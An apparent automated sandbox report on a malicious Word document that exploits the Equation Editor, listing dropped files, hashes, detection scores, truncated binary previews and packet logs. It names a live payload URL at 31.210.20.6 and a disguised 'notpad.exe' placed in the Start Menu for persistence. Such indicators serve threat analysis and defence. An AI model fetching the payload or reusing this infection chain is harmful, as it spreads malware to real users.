                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                C:\ProgramData\vcruntime140.dll
                                                                Process:C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):83784
                                                                Entropy (8bit):6.890347360270656
                                                                Encrypted:false
                                                                SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                MD5:7587BF9CB4147022CD5681B015183046
                                                                SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Sugvt[1].exe
                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:downloaded
                                                                Size (bytes):251192
                                                                Entropy (8bit):7.78065991811089
                                                                Encrypted:false
                                                                SSDEEP:3072:voiswQNk+vZJKZ0Hx7hA0qstfzoeAWRfS8ypYAxBWA3VcuVdxtWL1ySDMIeKppKe:gRV4QpZvtfUeAIQHuA36cdHj2O6K0Xw
                                                                MD5:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                SHA1:48E8A88CA75782489DB9B5DA0DFF11F050A7A4E0
                                                                SHA-256:D346665DC0A3C37256F313F6E9E41C254ACF70C599D007F1391128C4B3771CE6
                                                                SHA-512:483BFD819158B38E996780C3D59EE22B3A3D372D1CD38BFA68DC817370663DA0978F259C836DF42F5C2F5E3FD7EE9217D7F185664678C575C24A2F131226BAD7
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 47%
                                                                IE Cache URL:http://31.210.20.6/3/Sugvt.exe
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..`.................j...J.......... ........@.. ....................... ............@.................................t...W.......,G..............8............................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...,G.......H...l..............@..@.reloc..............................@..B........................H........c...%......W...0F...............................................0...........(.......-.&&.(....o.....-.&&+.}....+.}....+.*...0..)........{.....-.&.....+..+...3......-.&.(....+.*....................0...........{.....,.&.,.+..+....s..-.&......+....-/&&..}......}.......s....o....}.......}....8....}....+...{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X ...Q.{....Xa}......}.....{....o....:q....(....+..(........}........
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C112D4.png
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:PNG image data, 288 x 424, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):84949
                                                                Entropy (8bit):7.992825260372582
                                                                Encrypted:true
                                                                SSDEEP:1536:JPs/c63J2lk4Gjh3mkGaWqOJcJ8BsjTxfNbQ2ds7WQGBJeDSl:JPMtIlkdjh2kJWgjpf1b/eDI
                                                                MD5:23A2AF973BBF6CC30633EB218EF11067
                                                                SHA1:69E4BB8450F096694A026CA859498AE30D3FB1FB
                                                                SHA-256:1AD903E11D4A00E9AF3A24E5F92A71295A693945CC3BBF894D6176BA831445C4
                                                                SHA-512:85376D9C5A4B688E781938F11AE3CBB592F86C4593B7BCC8E74EE32ECEB0FF374A17B5DFFD8E3ECA0498420AB07F04A75423992416B33BE59EA35836671BB838
                                                                Malicious:false
                                                                Preview: .PNG........IHDR... ..........`85.. .IDATx....8.%FR.. @....y..&...D.eU.HI..{..q..D...b.o..t+.Rs.c..._M-(...~'...o...O6}..|..s...._.g...md.Z...cJ...uI9.TJ..r..%.9..s.....'~...^...........o...w...r....3..e..m...~.R.w..{....ui.E~iS^}.......}.x.N.......I.....?o.;j...x..G....FcW....Wr...op-....z.+..............?........+M..3...j.....%..9......Q......)...o....?3*...-...tV.F....m.I.@.t...&.*}.....w....>...p..........F...!,..&k....y.,ky.@O.B..BZmI..Z...9...A....>. d..|f.a...yh^....?...?......2...........@.g\z.K....4~_.Os.....gC.oT.C.Y...Ab..p?w......Z...~Z...|.H>M9x..}.b.~..?.......`q....2?,....0..@.....k..|F..@....{.t...=.N..R"I).w/.5Ox..g.*..E)b.,f....).a..+..].^. ...ic+.2%O..d..M...l;.D).......W...H.nL.....-....m..C.......!U..{2.f?.f..A..("....).:.G>..U.....DD.|w.wi.oR...jG*.......@,..e6..K{.t.0...#j.&../..j.....:..t/...}..x....K.#1K.'3h.A.a....|~.P.n.3.......OF......O.'.4.+.....kK....=T*.~.Y..0.i2.,..2`B.w.q..8...
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4C77723-97C0-4A14-814E-1968BCE52029}.tmp
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1024
                                                                Entropy (8bit):0.05390218305374581
                                                                Encrypted:false
                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                Malicious:false
                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FDB545E2-A1F4-4D0B-BC71-CA4D3862B689}.tmp
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:Targa image data - RLE 65536 x 65536 x 0 ""
                                                                Category:dropped
                                                                Size (bytes):2560
                                                                Entropy (8bit):0.41457256320776753
                                                                Encrypted:false
                                                                SSDEEP:3:ylYdltn/lL6VVg7NNKlqlURDkC4Rlc1pK/lVlJl/FAY/ldzNBBllqPxZlhQtChj:13MVKpAlq+YHlcTK/0Yz0PxZUta
                                                                MD5:97D70616A654FEB5A6CEE5B01A432322
                                                                SHA1:2DBEA561E55077EF2723753349B8946BE60ADAB5
                                                                SHA-256:91C46782F089DA12A9AA47E3C310AB89C4096F8D06739CA88126CBEC17C09929
                                                                SHA-512:21285582F5AC8BE927BDA53299469D724B691EF303329D1C5F555DFD9D1F2343BB81A3E4B1738765F4AF07A4371B783E8BF9352236E6488A885B608801716B1B
                                                                Malicious:false
                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                Process:C:\Users\user\toqqx.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):251192
                                                                Entropy (8bit):7.78065991811089
                                                                Encrypted:false
                                                                SSDEEP:3072:voiswQNk+vZJKZ0Hx7hA0qstfzoeAWRfS8ypYAxBWA3VcuVdxtWL1ySDMIeKppKe:gRV4QpZvtfUeAIQHuA36cdHj2O6K0Xw
                                                                MD5:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                SHA1:48E8A88CA75782489DB9B5DA0DFF11F050A7A4E0
                                                                SHA-256:D346665DC0A3C37256F313F6E9E41C254ACF70C599D007F1391128C4B3771CE6
                                                                SHA-512:483BFD819158B38E996780C3D59EE22B3A3D372D1CD38BFA68DC817370663DA0978F259C836DF42F5C2F5E3FD7EE9217D7F185664678C575C24A2F131226BAD7
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 47%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..`.................j...J.......... ........@.. ....................... ............@.................................t...W.......,G..............8............................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...,G.......H...l..............@..@.reloc..............................@..B........................H........c...%......W...0F...............................................0...........(.......-.&&.(....o.....-.&&+.}....+.}....+.*...0..)........{.....-.&.....+..+...3......-.&.(....+.*....................0...........{.....,.&.,.+..+....s..-.&......+....-/&&..}......}.......s....o....}.......}....8....}....+...{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X ...Q.{....Xa}......}.....{....o....:q....(....+..(........}........
                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PL_503_13_570.LNK
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Wed May 5 03:33:33 2021, length=96745, window=hide
                                                                Category:dropped
                                                                Size (bytes):2068
                                                                Entropy (8bit):4.5238401563505155
                                                                Encrypted:false
                                                                SSDEEP:48:8W/XT0jFxhvjytv+Qh2W/XT0jFxhvjytv+Q/:8W/XojFxhvetv+Qh2W/XojFxhvetv+Q/
                                                                MD5:5232E49EC240FE9965EABF74911D0C3E
                                                                SHA1:C6B13BDFD7E8CDE5BB38E121ED102AAC02A38D21
                                                                SHA-256:27692E721D72C8E230FEA5EDA37E344EEBD3CCC679D6FA443CF7ED0AFB466838
                                                                SHA-512:D3CED6E1A9FDDEB621FCC7D7C193448FEBDEB18E777F1F391B9A65877253F1E52824A9265CD248845095ED7A7C5F642D5680C7E70F4EC2575233F13327E99328
                                                                Malicious:false
                                                                Preview: L..................F.... ...na...{..na...{..\Z..gA...y...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2..y...R1$ .PL_503~1.DOC..R.......Q.y.Q.y*...8.....................P.L._.5.0.3._.1.3._.5.7.0...d.o.c.x.......|...............-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Desktop\PL_503_13_570.docx.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.L._.5.0.3._.1.3._.5.7.0...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......035347..........D_....3N...W...9F.C...........[D_
                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):79
                                                                Entropy (8bit):4.125407729152288
                                                                Encrypted:false
                                                                SSDEEP:3:H+UTWWVdrultJAWWVdrulmxW+UTWWVdrulv:HVjpEJAjpujpc
                                                                MD5:E2DDBD406167EFBA76CDD5993E8BA39B
                                                                SHA1:26C3D0CC660821981ABB73AF70FCA21350F41BA4
                                                                SHA-256:AF0B1925B6C9A942B992164D588D81C1CEC281626527C8636F58E15A75EA7691
                                                                SHA-512:FA071A7A4FDEA7D3D962717297B73B9045E1646DB9083197CA7CF04C378CCCAD3AB4178353AE2939CAC3066C52B41C0386E9FDB68D55286D464B1124D7021DFD
                                                                Malicious:false
                                                                Preview: [misc]..PL_503_13_570.LNK=0..PL_503_13_570.LNK=0..[misc]..PL_503_13_570.LNK=0..
                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):162
                                                                Entropy (8bit):2.431160061181642
                                                                Encrypted:false
                                                                SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                Malicious:false
                                                                Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe
                                                                Process:C:\Users\user\toqqx.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):251192
                                                                Entropy (8bit):7.78065991811089
                                                                Encrypted:false
                                                                SSDEEP:3072:voiswQNk+vZJKZ0Hx7hA0qstfzoeAWRfS8ypYAxBWA3VcuVdxtWL1ySDMIeKppKe:gRV4QpZvtfUeAIQHuA36cdHj2O6K0Xw
                                                                MD5:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                SHA1:48E8A88CA75782489DB9B5DA0DFF11F050A7A4E0
                                                                SHA-256:D346665DC0A3C37256F313F6E9E41C254ACF70C599D007F1391128C4B3771CE6
                                                                SHA-512:483BFD819158B38E996780C3D59EE22B3A3D372D1CD38BFA68DC817370663DA0978F259C836DF42F5C2F5E3FD7EE9217D7F185664678C575C24A2F131226BAD7
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 47%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..`.................j...J.......... ........@.. ....................... ............@.................................t...W.......,G..............8............................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...,G.......H...l..............@..@.reloc..............................@..B........................H........c...%......W...0F...............................................0...........(.......-.&&.(....o.....-.&&+.}....+.}....+.*...0..)........{.....-.&.....+..+...3......-.&.(....+.*....................0...........{.....,.&.,.+..+....s..-.&......+....-/&&..}......}.......s....o....}.......}....8....}....+...{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X ...Q.{....Xa}......}.....{....o....:q....(....+..(........}........
                                                                C:\Users\user\Desktop\~$_503_13_570.docx
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):162
                                                                Entropy (8bit):2.431160061181642
                                                                Encrypted:false
                                                                SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                Malicious:false
                                                                Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                C:\Users\user\toqqx.exe
                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):251192
                                                                Entropy (8bit):7.78065991811089
                                                                Encrypted:false
                                                                SSDEEP:3072:voiswQNk+vZJKZ0Hx7hA0qstfzoeAWRfS8ypYAxBWA3VcuVdxtWL1ySDMIeKppKe:gRV4QpZvtfUeAIQHuA36cdHj2O6K0Xw
                                                                MD5:5753388FBFCDE9E08D00AC9E2BE5D881
                                                                SHA1:48E8A88CA75782489DB9B5DA0DFF11F050A7A4E0
                                                                SHA-256:D346665DC0A3C37256F313F6E9E41C254ACF70C599D007F1391128C4B3771CE6
                                                                SHA-512:483BFD819158B38E996780C3D59EE22B3A3D372D1CD38BFA68DC817370663DA0978F259C836DF42F5C2F5E3FD7EE9217D7F185664678C575C24A2F131226BAD7
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 47%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..`.................j...J.......... ........@.. ....................... ............@.................................t...W.......,G..............8............................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...,G.......H...l..............@..@.reloc..............................@..B........................H........c...%......W...0F...............................................0...........(.......-.&&.(....o.....-.&&+.}....+.}....+.*...0..)........{.....-.&.....+..+...3......-.&.(....+.*....................0...........{.....,.&.,.+..+....s..-.&......+....-/&&..}......}.......s....o....}.......}....8....}....+...{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X ...Q.{....Xa}......}.....{....o....:q....(....+..(........}........

                                                                Static File Info

                                                                General

                                                                File type:Microsoft Word 2007+
                                                                Entropy (8bit):7.990455579948406
                                                                TrID:
                                                                • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                • ZIP compressed archive (8000/1) 7.92%
                                                                File name:PL_503_13_570.docx
                                                                File size:96745
                                                                MD5:158e499db47d9c6a56449c86f3b1596f
                                                                SHA1:6d0e9274649112ec7e9a757168b7de6eb2c48ff2
                                                                SHA256:5e7fe9a4eb6dc098b6ed28b083d277455d66a515e7c78b270ad0515a90279f45
                                                                SHA512:f5bac985860f4c9ed7f8191cf28c223eea6676fa7dcac71a930a1e49ea6b6b3c41eb1c22f64119830c3374c889bd66cdb1b20af16312d8832c09ec59e2a72956
                                                                SSDEEP:1536:jQUWNY6UPs/c63J2lk4Gjh3mkGaWIpOJcJ8BsjTxfNbQxds7WQGBJeDS8:jQJG6UPMtIlkdjh2kJWgjpfmb/eDz
                                                                File Content Preview:PK........&\.R....z...0.......[Content_Types].xmlUT....0.`.0.`.0.`.T.n.0..W.?D."b...*.....T...=...d...;.4.....%.=....o0Zk.-..iMA.y.d`......1}.>.,Df.S.@A6..hx{3.n....&.d..{.4.9h.r..`..^..G?.../6.z...SnM...1q....*.P1{Y......H..mLZ.a.).Y.:].....)...{.\....B.

                                                                File Icon

                                                                Icon Hash:e4e6a2a2a4b4b4a4

                                                                Static OLE Info

                                                                General

                                                                Document Type:OpenXML
                                                                Number of OLE Files:1

                                                                OLE File "/opt/package/joesandbox/database/analysis/404284/sample/PL_503_13_570.docx"

                                                                Indicators

                                                                Has Summary Info:False
                                                                Application Name:unknown
                                                                Encrypted Document:False
                                                                Contains Word Document Stream:
                                                                Contains Workbook/Book Stream:
                                                                Contains PowerPoint Document Stream:
                                                                Contains Visio Document Stream:
                                                                Contains ObjectPool Stream:
                                                                Flash Objects Count:
                                                                Contains VBA Macros:False

                                                                Summary

                                                                Title:
                                                                Subject:
                                                                Author:Dell
                                                                Keywords:
                                                                Template:Normal.dotm
                                                                Last Saved By:Dell
                                                                Revion Number:1
                                                                Total Edit Time:1
                                                                Create Time:2021-04-28T13:50:00Z
                                                                Last Saved Time:2021-04-28T13:51:00Z
                                                                Number of Pages:1
                                                                Number of Words:0
                                                                Number of Characters:0
                                                                Creating Application:Microsoft Office Word
                                                                Security:0

                                                                Document Summary

                                                                Number of Lines:0
                                                                Number of Paragraphs:0
                                                                Thumbnail Scaling Desired:false
                                                                Company:
                                                                Contains Dirty Links:false
                                                                Shared Document:false
                                                                Changed Hyperlinks:false
                                                                Application Version:15.0000

                                                                Streams

                                                                Stream Path: EQUAtIoN nativE, File Type: data, Stream Size: 1937
                                                                General
                                                                Stream Path:EQUAtIoN nativE
                                                                File Type:data
                                                                Stream Size:1937
                                                                Entropy:7.188644563
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . w . . . . . " z . 7 . 8 n . ` . Q O > . n . < . T . ~ . . G . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . P . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . D . . . . . . . . . . . . . . k D h s . . l w e . . 2 . ( 5 . . . . L P ' . . . d . . . \\ . . ( . = . . . = . . n . . y . 4 . . . A . . . . . U . . . . 7 . . . q m . . . x . . . . . . } . . . T M . . . D C ; . . ? N . . U . D t . ^ . . # . . . . . . N . , . p u . ' . . 3 . . s t . R . . . . m . & . = . p . . .
                                                                Data Raw:1c 00 bf 77 01 00 fc a5 cf 22 7a 02 37 bd 38 6e a0 60 c8 51 4f 3e 19 6e a5 3c 1e 54 02 7e 01 eb 47 0a 01 05 8f ba 30 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 06 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 c3 44 00 00 00 00 e9 a2 01 00 00 04 9f b0 81 9e 6b 44 68 73 bb 89 6c 77 65 12 9d 32 ca 28

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                May 4, 2021 21:34:09.161539078 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.212819099 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.212904930 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.213181973 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.261564970 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.262763977 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.262790918 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.262804031 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.262821913 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.262834072 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.262846947 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.262851000 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.262867928 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.262873888 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.262876987 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.262883902 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.262909889 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.262913942 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.262917042 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.262919903 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.262933969 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.262959003 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.262972116 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.272619009 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311681986 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311708927 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311726093 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311743021 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311748981 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311758041 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311774015 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311774015 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311779022 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311781883 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311789989 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311806917 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311814070 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311821938 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311831951 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311847925 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311861038 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311872959 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311902046 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311917067 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311933994 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311950922 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311950922 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311968088 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311978102 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311981916 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.311986923 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.311996937 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.312005043 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.312005997 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.312021017 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.312022924 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.312037945 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.312045097 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.312072039 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.313113928 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.313138008 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.360677958 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360702991 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360718966 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360734940 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360754013 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360769987 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360786915 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360805988 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360822916 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360838890 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360855103 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360872030 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360873938 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.360888958 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360903025 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.360908985 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.360925913 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360944986 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.360970974 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.360979080 CEST4916580192.168.2.2231.210.20.6
